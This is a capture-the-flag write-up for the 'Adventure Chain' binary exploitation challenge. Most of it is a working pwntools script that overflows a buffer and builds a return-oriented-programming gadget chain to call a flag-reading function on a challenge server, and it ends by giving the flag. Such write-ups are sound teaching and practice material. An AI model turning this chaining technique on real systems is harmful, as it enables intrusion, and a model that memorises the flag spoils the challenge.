Adventure Chain

Challenge Author

Challenge Description

Kathleen is on her next adventure, which marked her name in history of Computer Science forever. Looks like the pieces of her ARC code seem to be brewing something notorious. Follow the chains which might lead you to a hideous place where you can claim your mastery and discover the unintended invention

Short writeup

Use ROPgadgets to bypass the argument checks and finally call the function which reads flag.txt.

from pwn import *
#p = process("./chall")
p = remote('34.72.218.129',4444)

p.sendlineafter(">> ","1")

pop_rdi = p64(0x0000000000400a93)
pop_rsi_r15 = p64(0x0000000000400a91)
assert_ = p64(0x00000000004007d7)
setValue = p64(0x00000000004007ec)
flag = p64(0x000000000040082c)

#exp = "a"*56 + auth + pop_rdi + p64(0xdeadbeef) + add_bal + pop_rdi + p64(0xba5eba11) + pop_rsi_r15 + p64(0xbedabb1e) + p64(0xbedabb1e) + flag

exp  = "a"*40
exp += assert_
exp += pop_rdi + p64(0xdeadbeef)
exp += setValue
exp += pop_rdi + p64(0xdeadc0de)
exp += pop_rsi_r15 + p64(0xdead10cc) + "a"*8
exp += flag
#gdb.attach(p)
p.sendlineafter("Enter your name:",exp)
p.interactive()

Flag

shaktictf{r0pe_climbing_chaining_1337_way}

Keys	Action
`?`	Open this help
`n`	Next page
`p`	Previous page
`s`	Search